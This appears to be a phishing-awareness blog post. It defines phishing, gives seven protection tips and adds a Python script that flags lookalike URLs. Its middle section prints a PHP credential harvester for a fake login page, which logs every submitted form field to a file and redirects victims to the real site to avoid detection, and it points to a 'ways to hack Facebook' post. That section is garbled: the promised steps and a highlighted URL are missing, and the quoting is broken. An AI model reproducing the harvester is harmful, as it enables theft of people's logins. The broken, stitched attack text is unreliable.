Before starting with the topic, one should be clear about the definition of phishing. Phishing is a way of attempting to acquire sensitive information such as passwords, usernames, and credit card details by masquerading as a trustworthy entity in an electronic communication. This is similar to fishing, where the fisherman puts bait on the hook and it appears to be genuine food for the fish, but the hook inside it takes the fish out of the lake. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and it exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
In this post we will discuss a little about what phishing is. Please note that what we are covering here is ways to protect yourself from phishing scams; it is just the basics and not a phishing tutorial. In a phishing attack, an attacker creates a fake login page of a legitimate website and lures the victim into logging in through it. The site under attack is known as the phished site, and the fake login page used for capturing or stealing information is known as the phished page. To perform a phishing attack, an attacker performs the following steps:
<?php
header (‘Location: ‘www.realdomainname.com’);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Here he/she replaces the URL with the red background by the real URL of the phished page. This file is then also uploaded there so that the victim gets redirected to the original website, to avoid detection of the phishing attack.
Nearly all phishing attacks are conducted in the same way. If you have been a regular reader of my blog then you might know we have already covered Top 10 ways to hack Facebook account. For practice, in future we will cover a few more tutorials on phishing, but for now let's protect yourself from phishing scams as given below.
WHAT ARE THE WAYS TO PROTECT YOURSELF FROM PHISHING SCAMS-HOW TO AVOID PHISHING ATTACK
There are many common problems which lead to security risks and can damage your computers and systems. Social media access can unintentionally lead to viruses or malware because of phishing sites that appear to be legitimate. Email attachments from unknown senders, or even from familiar sources, may be malicious.
On the web, things are not always as they seem. Although a filename may look legitimate, it could carry a completely different program, i.e. it can be a keylogger.
There is no guarantee that you or your employees will not download a malicious file by mistake, but it is important to take steps to prevent it. Below are some tips to protect yourself against phishing attacks.
ULTIMATE WAYS TO PROTECT YOURSELF FROM PHISHING SCAMS
#1 The best way to recognize a phishing attempt is to be suspicious of unsolicited phone calls, visits, or email messages from individuals asking about employees or other internal information. If an unknown individual claims to be from a legitimate organization, try to verify his or her identity directly with the company.
#2 Do not provide personal information or information about your organization, including its structure or networks, unless you are certain of a person’s authority to have the information.
#3 Do not reveal personal or financial information in email, and do not respond to email solicitations if you want to protect yourself from phishing scams. This includes following links sent in email.
#4 Don’t send sensitive information over the Internet before checking a website’s security.
#5 If you want to protect yourself from phishing scams, always pay attention to the URL of a website. Malicious websites may look identical to a legitimate site, but the URL may use a variation in spelling or a different domain (e.g., .com vs. .net).
#6 If you are unsure whether an email request is legitimate, try to verify it by contacting the company directly. Do not use contact information provided on a website connected to the request; instead, check previous statements for contact information. Information about known phishing attacks is also available online from groups such as the Anti-Phishing Working Group.
#7 Install and maintain anti-virus software, firewalls, and email filters to reduce some of this traffic. Take advantage of any anti-phishing features offered by your email client and web browser.
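The URL check from tip #5 can be automated. The following is an added example, not code from the original post: it compares a link's host name against a short allowlist and reports the spelling-variation and different-domain tricks described above. The domains in `TRUSTED` and the function names are constructed for illustration, and taking the last two labels as the registered domain is a simplifying assumption.

```python
from urllib.parse import urlsplit

# Constructed allowlist; replace with the domains you really use.
TRUSTED = ["example-bank.com", "example-pay.net"]

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify(url: str) -> str:
    """Return 'trusted', 'punycode', 'tld-swap', 'embedded', 'lookalike' or 'unknown'."""
    # .hostname drops any "user@" part, so "trusted.com@other.test" yields other.test.
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    labels = host.split(".")
    # Assumption: the registered domain is the last two labels (no public-suffix list).
    registrable = ".".join(labels[-2:])
    if registrable in TRUSTED:
        return "trusted"
    if any(label.startswith("xn--") for label in labels):
        return "punycode"      # internationalised label that may render like ASCII
    name = labels[-2] if len(labels) >= 2 else host
    for good in TRUSTED:
        good_name = good.split(".")[0]
        if name == good_name:
            return "tld-swap"  # same name, different ending (.com vs. .net)
        if host.startswith(good + ".") or "." + good + "." in host:
            return "embedded"  # trusted name used as a subdomain of another site
        if 0 < edit_distance(name, good_name) <= 2:
            return "lookalike" # variation in spelling
    return "unknown"

if __name__ == "__main__":
    # Constructed sample links.
    for link in ("https://www.example-bank.com/login",
                 "https://examp1e-bank.com/login",
                 "https://example-bank.net/login",
                 "https://example-bank.com.login.evil.test/"):
        print(f"{classify(link):10} {link}")
```

Anything other than `trusted` deserves a second look before you type a password; `unknown` only means the host resembles nothing on the allowlist, not that it is safe.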